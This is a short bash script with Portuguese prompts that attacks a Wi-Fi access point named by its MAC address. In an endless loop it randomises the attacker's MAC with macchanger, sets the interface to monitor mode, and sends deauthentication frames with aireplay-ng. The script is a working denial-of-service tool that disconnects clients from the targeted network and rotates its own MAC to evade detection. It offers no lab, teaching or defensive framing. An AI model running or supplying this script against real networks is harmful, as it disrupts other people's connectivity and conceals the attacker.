#! /bin/bash

if [ ! $1 ]; then
     echo 'Favor inserir um MAC'
else
     while true
     do
          ifconfig wlan0mon down
          macchanger -r wlan0mon | grep "Trocando o MAC..."

          iwconfig wlan0mon mode monitor
          ifconfig wlan0mon up
          iwconfig wlan0mon | grep Mode

          sleep 3
          echo ZZzzzZzzzZzzz...
          aireplay-ng -0 5 -a $1 wlan0mon

     done
fi
